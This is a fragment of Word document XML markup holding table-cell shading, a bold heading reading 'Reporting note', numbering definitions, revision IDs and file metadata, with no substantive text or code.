            <w:shd w:val="clear" w:color="auto" w:fill="F4E3CC"/>
          </w:tcPr>
          <w:p w14:paraId="4EF103C8" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>⚠ Reporting note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2AE2E8" w14:textId="77777777" w:rsidR="00EA5F74"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35753E36" w14:textId="77777777" w:rsidR="005B2649" w:rsidRDefault="005B2649"/>
    <w:sectPr w:rsidR="005B2649"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621249">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="203517108">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="894855054">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1564562596">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1667898816">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="799762731">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2127310603">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="188491208">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1109158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649"/>
    <w:rsid w:val="00A40F33"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C9221E"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00EA5F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1B150"/>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2026-10-03T03:20:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>